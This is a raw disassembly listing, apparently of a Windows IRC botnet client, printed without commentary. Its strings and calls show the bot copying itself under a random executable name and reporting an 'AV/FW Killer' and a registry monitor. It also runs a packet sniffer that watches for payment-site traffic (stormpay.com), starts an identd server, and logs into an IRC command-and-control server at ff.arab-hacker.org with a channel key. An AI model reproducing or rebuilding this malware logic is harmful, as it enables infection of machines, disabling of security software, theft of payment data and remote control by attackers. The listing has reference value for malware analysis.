loc_40B93F: ; CODE XREF: sub_40B86A+76�j
mov eax, [ebp+var_30]
push 10h
imul eax, 234h
mov dword_44D064[eax], edi
lea eax, [ebp+var_1C]
push eax
push edi
call dword_44B6EC ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_40B9C4
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset aPsniffErrorBin ; "[PSNIFF]: Error: bind() failed, returne"...
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_40B9A0
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40842D
add esp, 14h
loc_40B9A0: ; CODE XREF: sub_40B86A+114�j
lea eax, [ebp+var_2B4]
push eax
call sub_4035E1
pop ecx
push edi
call dword_44B758 ; closesocket
push [ebp+var_30]
call sub_416507
pop ecx
push esi
call ds:dword_4942FC
loc_40B9C4: ; CODE XREF: sub_40B86A+F4�j
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_8]
push 4
push eax
push 98000001h
push edi
call dword_44B66C ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_40BA47
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset aPsniffErrorWsa ; "[PSNIFF]: Error: WSAIoctl() failed, ret"...
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_40BA23
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40842D
add esp, 14h
loc_40BA23: ; CODE XREF: sub_40B86A+197�j
lea eax, [ebp+var_2B4]
push eax
call sub_4035E1
pop ecx
push edi
call dword_44B758 ; closesocket
push [ebp+var_30]
call sub_416507
pop ecx
push esi
call ds:dword_4942FC
loc_40BA47: ; CODE XREF: sub_40B86A+177�j
push ebx
mov ebx, offset aStormpay_com ; "stormpay.com"
loc_40BA4D: ; CODE XREF: sub_40B86A+21B�j
; sub_40B86A+22D�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_102B4]
push edi
push esi
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_102B4]
push esi
push edi
push eax
push [ebp+var_4]
call dword_44B6D8 ; recv
cmp eax, 0FFFFFFFFh
jz loc_40BB5F
cmp [ebp+var_102AB], 6
jnz short loc_40BA4D
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov [ebp+var_C], eax
jnz short loc_40BA4D
lea eax, [ebp+var_1028C]
push offset aPsniff ; "[PSNIFF]"
push eax
call sub_419AB0
pop ecx
test eax, eax
pop ecx
jnz short loc_40BA4D
mov eax, ebx
xor edi, edi
test eax, eax
jz short loc_40BA4D
mov [ebp+arg_0], ebx
loc_40BABB: ; CODE XREF: sub_40B86A+26C�j
push eax
lea eax, [ebp+var_1028C]
push eax
call sub_419AB0
pop ecx
test eax, eax
pop ecx
jnz short loc_40BADD
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_40BABB
jmp loc_40BA4D
; ---------------------------------------------------------------------------
loc_40BADD: ; CODE XREF: sub_40B86A+262�j
lea eax, [ebp+var_1028C]
push eax
push [ebp+var_102A0]
call dword_44B5FC ; htons
movzx eax, ax
push eax
push [ebp+var_C]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, dword_43DFA4[eax*8]
push off_43DF88[eax*4]
lea eax, [ebp+var_2B4]
push offset aPsniffSuspicio ; "[PSNIFF]: Suspicious %s packet from: %s"...
push 200h
push eax
call sub_418EF0
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_40BB4D
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40842D
add esp, 14h
loc_40BB4D: ; CODE XREF: sub_40B86A+2C1�j
lea eax, [ebp+var_2B4]
push eax
call sub_4035E1
pop ecx
jmp loc_40BA4D
; ---------------------------------------------------------------------------
loc_40BB5F: ; CODE XREF: sub_40B86A+20E�j
call dword_44B654 ; WSAGetLastError
push eax
push offset aPsniffErrorRec ; "[PSNIFF]: Error: recv() failed, returne"...
lea eax, [ebp+var_2B4]
push 200h
push eax
call sub_418EF0
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_40BBA5
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40842D
add esp, 14h
loc_40BBA5: ; CODE XREF: sub_40B86A+319�j
lea eax, [ebp+var_2B4]
push eax
call sub_4035E1
pop ecx
push [ebp+var_4]
call dword_44B758 ; closesocket
push [ebp+var_30]
call sub_416507
pop ecx
push esi
call ds:dword_4942FC
sub_40B86A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BBCB proc near ; CODE XREF: sub_41B970+121�p
var_99C = dword ptr -99Ch
var_98C = byte ptr -98Ch
var_888 = byte ptr -888h
var_887 = byte ptr -887h
var_6F8 = byte ptr -6F8h
var_5F8 = byte ptr -5F8h
var_4F8 = byte ptr -4F8h
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_1EC = byte ptr -1ECh
var_E8 = dword ptr -0E8h
var_DC = dword ptr -0DCh
var_BC = dword ptr -0BCh
var_B8 = word ptr -0B8h
var_A4 = byte ptr -0A4h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 98Ch
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_8], ebx
mov [ebp+var_10], ebx
mov [ebp+var_C], offset sub_405938
push [ebp+var_C]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_494308
call esi
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_491BE8, eax
call esi
push eax
call sub_418FF0
pop ecx
call sub_40888A
push 2
call dword_44B76C ; SetErrorMode
push 7530h
push offset aFenr ; "FEnR"
push ebx
push ebx
call ds:dword_4943D0
push eax
call ds:dword_4943CC
cmp eax, 102h
jnz short loc_40BC4B
push 1
call ds:dword_49432C
loc_40BC4B: ; CODE XREF: sub_40BBCB+76�j
lea eax, [ebp+var_888]
push eax
push 202h
call dword_44B638 ; WSAStartup
cmp eax, ebx
mov [ebp+var_C], eax
jnz loc_40C221
cmp [ebp+var_888], 2
jnz loc_40C21B
xor eax, eax
mov al, [ebp+var_887]
cmp al, 2
jnz loc_40C21B
mov esi, 104h
lea eax, [ebp+var_3F4]
push esi
push eax
call ds:dword_494320
lea eax, [ebp+var_2F0]
push esi
push eax
push ebx
call ds:dword_494380
push eax
call ds:dword_4942F8
lea eax, [ebp+var_6F8]
push eax
lea eax, [ebp+var_5F8]
push eax
push ebx
lea eax, [ebp+var_2F0]
push ebx
push eax
call sub_41B4D0
lea eax, [ebp+var_6F8]
push eax
lea eax, [ebp+var_5F8]
push eax
push offset aSS_8 ; "%s%s"
lea eax, [ebp+var_4F8]
push esi
push eax
call sub_418EF0
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_419AB0
add esp, 30h
test eax, eax
jnz loc_40BEC0
cmp dword_43E1B0, ebx
mov esi, offset aAmngesiyko_exe ; "amngesiyko.exe"
jz short loc_40BD46
push esi
xor edi, edi
call sub_418E70
sub eax, 4
pop ecx
jz short loc_40BD46
loc_40BD23: ; CODE XREF: sub_40BBCB+179�j
call sub_419000
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov byte ptr aAmngesiyko_exe[edi], dl ; "amngesiyko.exe"
inc edi
call sub_418E70
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_40BD23
loc_40BD46: ; CODE XREF: sub_40BBCB+148�j
; sub_40BBCB+156�j
lea eax, [ebp+var_3F4]
push esi
push eax
lea eax, [ebp+var_1EC]
push offset aSS_9 ; "%s\\%s"
push eax
call sub_418D70
add esp, 10h
lea eax, [ebp+var_1EC]
push eax
call ds:dword_49437C
cmp eax, 0FFFFFFFFh
jz short loc_40BD86
lea eax, [ebp+var_1EC]
push 80h
push eax
call ds:dword_4943A8
loc_40BD86: ; CODE XREF: sub_40BBCB+1A7�j
mov esi, ds:dword_4943C8
lea eax, [ebp+var_1EC]
push ebx
push eax
lea eax, [ebp+var_2F0]
xor edi, edi
push eax
loc_40BD9D: ; CODE XREF: sub_40BBCB+209�j
call esi
test eax, eax
jnz short loc_40BDD6
call ds:dword_4942F0
cmp edi, ebx
jnz short loc_40BDD6
cmp eax, 20h
jz short loc_40BDB7
cmp eax, 5
jnz short loc_40BDD6
loc_40BDB7: ; CODE XREF: sub_40BBCB+1E5�j
push 1
pop edi
push 3A98h
call ds:dword_4942D8
lea eax, [ebp+var_1EC]
push ebx
push eax
lea eax, [ebp+var_2F0]
push eax
jmp short loc_40BD9D
; ---------------------------------------------------------------------------
loc_40BDD6: ; CODE XREF: sub_40BBCB+1D6�j
; sub_40BBCB+1E0�j ...
lea eax, [ebp+var_1EC]
push eax
call sub_409BEA
pop ecx
lea eax, [ebp+var_1EC]
push 7
push eax
call ds:dword_4943A8
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_4189A0
push 44h
lea eax, [ebp+var_E8]
pop esi
push esi
push ebx
push eax
call sub_4189A0
add esp, 18h
mov [ebp+var_E8], esi
mov [ebp+var_DC], offset dword_491D74
mov [ebp+var_B8], bx
push 1
pop esi
mov [ebp+var_BC], esi
call ds:dword_4943C4
push eax
push esi
push 100000h
call ds:dword_494370
lea ecx, [ebp+var_2F0]
push ecx
push eax
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_98C]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_418D70
add esp, 14h
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_3F4]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_98C]
push ebx
push eax
lea eax, [ebp+var_1EC]
push eax
call ds:dword_494330
test eax, eax
jz short loc_40BEC0
push 0C8h
call ds:dword_4942D8
push [ebp+var_24]
mov esi, ds:dword_4942E0
call esi
push [ebp+var_20]
call esi
call dword_44B620 ; WSACleanup
push ebx
call ds:dword_49432C
loc_40BEC0: ; CODE XREF: sub_40BBCB+137�j
; sub_40BBCB+2CB�j
cmp dword_4920A4, 2
jle short loc_40BF0C
mov eax, dword_4920A8
push dword ptr [eax+4]
call sub_4195F0
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_4943CC
push esi
call ds:dword_4942E0
mov eax, dword_4920A8
cmp [eax+8], ebx
jz short loc_40BF0C
push 7D0h
call ds:dword_4942D8
mov eax, dword_4920A8
push dword ptr [eax+8]
call ds:dword_4943C0
loc_40BF0C: ; CODE XREF: sub_40BBCB+2FC�j
; sub_40BBCB+326�j
cmp dword_43E1B4, ebx
jz short loc_40BF29
cmp dword_44B790, ebx
jnz short loc_40BF29
lea eax, [ebp+var_4F8]
push eax
call sub_4038C0
pop ecx
loc_40BF29: ; CODE XREF: sub_40BBCB+347�j
; sub_40BBCB+34F�j
lea eax, [ebp+var_A4]
push offset aMainBotStarted ; "[MAIN]: Bot started."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_A4]
push ebx
push eax
call sub_4161EB
lea eax, [ebp+var_A4]
push eax
call sub_4035E1
push 0B80h
push ebx
push offset dword_44C2D8
call sub_4189A0
lea eax, [ebp+var_A4]
push offset aProcsAvFwKille ; "[PROCS]: AV/FW Killer active."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_A4]
push 1
push eax
call sub_4161EB
add esp, 38h
mov edi, eax
mov esi, ds:dword_4942F4
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push offset sub_40B84A
push ebx
push ebx
call esi
imul edi, 234h
cmp eax, ebx
mov dword_44D06C[edi], eax
jnz short loc_40BFC9
call ds:dword_4942F0
push eax
lea eax, [ebp+var_A4]
push offset aProcsFailedToS ; "[PROCS]: Failed to start AV/FW killer t"...
push eax
call sub_418D70
add esp, 0Ch
loc_40BFC9: ; CODE XREF: sub_40BBCB+3E1�j
lea eax, [ebp+var_A4]
push eax
call sub_4035E1
lea eax, [ebp+var_A4]
mov [esp+99Ch+var_99C], offset aSecureRegistry ; "[SECURE]: Registry monitor active."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_A4]
push 1
push eax
call sub_4161EB
add esp, 14h
mov edi, eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4F8]
push ebx
push eax
push offset sub_403930
push ebx
push ebx
call esi
imul edi, 234h
cmp eax, ebx
mov dword_44D06C[edi], eax
jnz short loc_40C03C
call ds:dword_4942F0
push eax
lea eax, [ebp+var_A4]
push offset aSecureFailedTo ; "[SECURE]: Failed to start registry thre"...
push eax
call sub_418D70
add esp, 0Ch
loc_40C03C: ; CODE XREF: sub_40BBCB+454�j
lea eax, [ebp+var_A4]
push eax
call sub_4035E1
push 2
call sub_416433
pop ecx
test eax, eax
pop ecx
jnz short loc_40C0C1
lea eax, [ebp+var_A4]
push offset aIdentdServerRu ; "[IDENTD]: Server running on Port: 113."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_A4]
push 2
push eax
call sub_4161EB
add esp, 14h
mov edi, eax
lea eax, [ebp+var_8]
push eax
push ebx
push edi
push offset sub_40823C
push ebx
push ebx
call esi
imul edi, 234h
cmp eax, ebx
mov dword_44D06C[edi], eax
jnz short loc_40C0B4
call ds:dword_4942F0
push eax
lea eax, [ebp+var_A4]
push offset aIdentdFailedTo ; "[IDENTD]: Failed to start server, error"...
push eax
call sub_418D70
add esp, 0Ch
loc_40C0B4: ; CODE XREF: sub_40BBCB+4CC�j
lea eax, [ebp+var_A4]
push eax
call sub_4035E1
pop ecx
loc_40C0C1: ; CODE XREF: sub_40BBCB+488�j
call sub_419000
push 0Ah
xor edx, edx
pop ecx
div ecx
push 7Fh
push offset aFf_arabHacker_ ; "ff.arab-hacker.org"
push offset dword_491BF4
mov dword_491D6C, edx
call sub_4191A0
mov eax, dword_43E194
push 3Fh
mov edi, offset dword_491C74
push offset aFf ; "#ff"
push edi
mov dword_491D44, eax
call sub_4191A0
push 3Fh
mov esi, offset dword_491CB4
push offset aFuckoff ; "fuckoff"
push esi
call sub_4191A0
add esp, 24h
mov dword_491D48, ebx
loc_40C11B: ; CODE XREF: sub_40BBCB+5F6�j
; sub_40BBCB+601�j ...
mov [ebp+var_4], ebx
loc_40C11E: ; CODE XREF: sub_40BBCB+5AA�j
cmp dword_44B7A8, ebx
jnz short loc_40C13C
lea eax, [ebp+var_14]
push ebx
push eax
call dword_44B604 ; InternetGetConnectedState
test eax, eax
jnz short loc_40C13C
push 7530h
jmp short loc_40C168
; ---------------------------------------------------------------------------
loc_40C13C: ; CODE XREF: sub_40BBCB+559�j
; sub_40BBCB+568�j
push offset dword_491BF0
mov dword_491D68, ebx
call sub_40C22A
cmp eax, 2
mov [ebp+var_C], eax
jz loc_40C216
cmp dword_491D68, ebx
jz short loc_40C163
dec [ebp+var_4]
loc_40C163: ; CODE XREF: sub_40BBCB+593�j
push 0BB8h
loc_40C168: ; CODE XREF: sub_40BBCB+56F�j
call ds:dword_4942D8
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_40C11E
cmp [ebp+var_C], 2
jz loc_40C216
cmp [ebp+var_10], ebx
jz short loc_40C1C6
push 7Fh
push offset aFf_arabHacker_ ; "ff.arab-hacker.org"
push offset dword_491BF4
call sub_4191A0
mov eax, dword_43E194
push 3Fh
push offset aFf ; "#ff"
push edi
mov dword_491D44, eax
call sub_4191A0
push 3Fh
push offset aFuckoff ; "fuckoff"
push esi
call sub_4191A0
add esp, 24h
mov [ebp+var_10], ebx
jmp loc_40C11B
; ---------------------------------------------------------------------------
loc_40C1C6: ; CODE XREF: sub_40BBCB+5B9�j
cmp byte_491D5C, bl
jz loc_40C11B
push 7Fh
push offset byte_491D5C
push offset dword_491BF4
call sub_4191A0
mov eax, dword_43E198
push 3Fh
push offset dword_491D60
push edi
mov dword_491D44, eax
call sub_4191A0
push 3Fh
push offset dword_491D64
push esi
call sub_4191A0
add esp, 24h
mov [ebp+var_10], 1
jmp loc_40C11B
; ---------------------------------------------------------------------------
loc_40C216: ; CODE XREF: sub_40BBCB+587�j
; sub_40BBCB+5B0�j
call sub_4163B4
loc_40C21B: ; CODE XREF: sub_40BBCB+A4�j
; sub_40BBCB+B4�j
call dword_44B620 ; WSACleanup
loc_40C221: ; CODE XREF: sub_40BBCB+97�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40BBCB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C22A proc near ; CODE XREF: sub_40BBCB+57C�p
; DATA XREF: sub_40C50A+3B13�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_40C24F: ; CODE XREF: sub_40C22A+E6�j
; sub_40C22A+136�j ...
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_3C]
call dword_44B6C0 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_40AED0
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_40C37C
push 1Ch
lea eax, [ebp+var_2C]
push 0
push eax
call sub_4189A0
push 0
lea eax, [ebp+var_2C]
push dword_43E1C4
push dword_43E1C0
push eax
call sub_4138AA
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_44D070
push edi
push eax
call sub_4191A0
add esp, 28h
push 6
push 1
push 2
call dword_44B740 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov dword_44D064[eax], esi
lea eax, [ebp+var_10]
push eax
push esi
call dword_44B668 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40C315
push esi
call dword_44B758 ; closesocket
call sub_40AEF9
push 7D0h
loc_40C30A: ; CODE XREF: sub_40C22A+146�j
call ds:dword_4942D8
jmp loc_40C24F
; ---------------------------------------------------------------------------
loc_40C315: ; CODE XREF: sub_40C22A+CD�j
lea eax, [ebp+var_18C]
push eax
push offset aMainConnectedT ; "[MAIN]: Connected to %s."
call sub_403655
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40C392
add esp, 28h
mov edi, eax
push esi
call dword_44B758 ; closesocket
test edi, edi
jz loc_40C24F
cmp edi, 1
jnz short loc_40C372
push 0DBBA0h
jmp short loc_40C30A
; ---------------------------------------------------------------------------
loc_40C372: ; CODE XREF: sub_40C22A+13F�j
cmp edi, 2
jz short loc_40C380
jmp loc_40C24F
; ---------------------------------------------------------------------------
loc_40C37C: ; CODE XREF: sub_40C22A+5A�j
xor eax, eax
jmp short loc_40C38C
; ---------------------------------------------------------------------------
loc_40C380: ; CODE XREF: sub_40C22A+14B�j
push [ebp+var_34]
call sub_416507
pop ecx
push 2
pop eax
loc_40C38C: ; CODE XREF: sub_40C22A+154�j
pop edi
pop esi
leave
retn 4
sub_40C22A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C392 proc near ; CODE XREF: sub_40C22A+123�p
var_1A10 = byte ptr -1A10h
var_A10 = byte ptr -0A10h
var_240 = byte ptr -240h
var_1A0 = byte ptr -1A0h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A10h
call sub_418D40
push ebx
push esi
push edi
xor ebx, ebx
push 2
mov [ebp+var_8], ebx
lea eax, [ebp+var_1A0]
pop ecx
loc_40C3B0: ; CODE XREF: sub_40C392+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_40C3B0
cmp byte_491D58, bl
jz short loc_40C3D7
push offset byte_491D58
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0]
call sub_4083E7
add esp, 0Ch
loc_40C3D7: ; CODE XREF: sub_40C392+2E�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push ebx
push ebx
push 2
push eax
call sub_4138AA
add esp, 10h
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_C]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_418D70
add esp, 14h
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40C441
push [ebp+arg_0]
call dword_44B758 ; closesocket
push 1388h
call ds:dword_4942D8
loc_40C43A: ; CODE XREF: sub_40C392+D9�j
; sub_40C392+153�j
xor eax, eax
loc_40C43C: ; CODE XREF: sub_40C392+173�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40C441: ; CODE XREF: sub_40C392+92�j
; sub_40C392+F8�j ...
mov esi, 1000h
lea eax, [ebp+var_1A10]
push esi
push ebx
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_1A10]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_44B6D8 ; recv
test eax, eax
jle short loc_40C43A
lea eax, [ebp+var_A10]
push eax
lea eax, [ebp+var_1A10]
push eax
call sub_4098D3
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_40C441
lea edi, [ebp+var_A10]
loc_40C492: ; CODE XREF: sub_40C392+165�j
push 1
pop esi
loc_40C495: ; CODE XREF: sub_40C392+144�j
push [ebp+arg_1C]
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_240]
push eax
lea eax, [ebp+var_1A0]
push eax
push [ebp+arg_18]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [edi]
call sub_40C50A
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_40C4D8
push 7D0h
call ds:dword_4942D8
jmp short loc_40C495
; ---------------------------------------------------------------------------
loc_40C4D8: ; CODE XREF: sub_40C392+137�j
cmp esi, 0FFFFFFFDh
jz short loc_40C502
cmp esi, 0FFFFFFFEh
jz short loc_40C4FE
cmp esi, 0FFFFFFFFh
jz loc_40C43A
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_40C492
jmp loc_40C441
; ---------------------------------------------------------------------------
loc_40C4FE: ; CODE XREF: sub_40C392+14E�j
push 1
jmp short loc_40C504
; ---------------------------------------------------------------------------
loc_40C502: ; CODE XREF: sub_40C392+149�j
push 2
loc_40C504: ; CODE XREF: sub_40C392+16E�j
pop eax
jmp loc_40C43C
sub_40C392 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C50A proc near ; CODE XREF: sub_40C392+12A�p
var_15B0 = byte ptr -15B0h
var_11B0 = byte ptr -11B0h
var_FB0 = byte ptr -0FB0h
var_DB0 = byte ptr -0DB0h
var_CB0 = byte ptr -0CB0h
var_CAC = byte ptr -0CACh
var_BAC = byte ptr -0BACh
var_BA8 = byte ptr -0BA8h
var_AA8 = byte ptr -0AA8h
var_A28 = byte ptr -0A28h
var_9C7 = byte ptr -9C7h
var_9C6 = byte ptr -9C6h
var_9C4 = byte ptr -9C4h
var_9C3 = byte ptr -9C3h
var_9BA = byte ptr -9BAh
var_9B8 = byte ptr -9B8h
var_9B6 = byte ptr -9B6h
var_9B5 = byte ptr -9B5h
var_928 = byte ptr -928h
var_90C = dword ptr -90Ch
var_908 = byte ptr -908h
var_804 = dword ptr -804h
var_800 = dword ptr -800h
var_7FC = byte ptr -7FCh
var_7F8 = dword ptr -7F8h
var_7F4 = byte ptr -7F4h
var_7F0 = dword ptr -7F0h
var_7EC = dword ptr -7ECh
var_7E8 = byte ptr -7E8h
var_780 = byte ptr -780h
var_774 = byte ptr -774h
var_770 = dword ptr -770h
var_76C = byte ptr -76Ch
var_768 = byte ptr -768h
var_75C = byte ptr -75Ch
var_73C = dword ptr -73Ch
var_738 = byte ptr -738h
var_710 = dword ptr -710h
var_708 = byte ptr -708h
var_6FC = dword ptr -6FCh
var_6F8 = byte ptr -6F8h
var_6F4 = byte ptr -6F4h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_6E8 = byte ptr -6E8h
var_6B8 = byte ptr -6B8h
var_681 = byte ptr -681h
var_680 = byte ptr -680h
var_678 = byte ptr -678h
var_670 = byte ptr -670h
var_66C = byte ptr -66Ch
var_668 = byte ptr -668h
var_5F8 = byte ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = dword ptr -5F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_570 = dword ptr -570h
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = dword ptr -564h
var_560 = dword ptr -560h
var_55C = byte ptr -55Ch
var_50C = dword ptr -50Ch
var_508 = byte ptr -508h
var_504 = dword ptr -504h
var_500 = byte ptr -500h
var_4F4 = dword ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = byte ptr -4E8h
var_4C0 = byte ptr -4C0h
var_4A0 = dword ptr -4A0h
var_488 = byte ptr -488h
var_480 = dword ptr -480h
var_47C = dword ptr -47Ch
var_478 = dword ptr -478h
var_474 = dword ptr -474h
var_470 = dword ptr -470h
var_46C = dword ptr -46Ch
var_468 = dword ptr -468h
var_464 = dword ptr -464h
var_460 = dword ptr -460h
var_45C = byte ptr -45Ch
var_458 = byte ptr -458h
var_444 = byte ptr -444h
var_434 = byte ptr -434h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_40C = dword ptr -40Ch
var_408 = byte ptr -408h
var_3FC = byte ptr -3FCh
var_3F8 = byte ptr -3F8h
var_3D8 = byte ptr -3D8h
var_3B4 = byte ptr -3B4h
var_398 = byte ptr -398h
var_388 = byte ptr -388h
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = byte ptr -2F8h
var_2EC = word ptr -2ECh
var_2EA = word ptr -2EAh
var_2E8 = dword ptr -2E8h
var_2DC = byte ptr -2DCh
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = byte ptr -0D4h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_54 = byte ptr -54h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 15B0h
call sub_418D40
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
mov [ebp+var_BC], 3
mov [ebp+var_10], ebx
mov [ebp+var_B8], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_D8], ebx
call sub_4189A0
push 1Bh
lea eax, [ebp+var_928]
push [ebp+arg_10]
push eax
call sub_4191A0
add esp, 18h
cmp [ebp+arg_0], ebx
jz loc_40C97C
push esi
lea eax, [ebp+var_FB0]
push ebx
push eax
call sub_4189A0
dec esi
lea eax, [ebp+var_FB0]
push esi
push [ebp+arg_0]
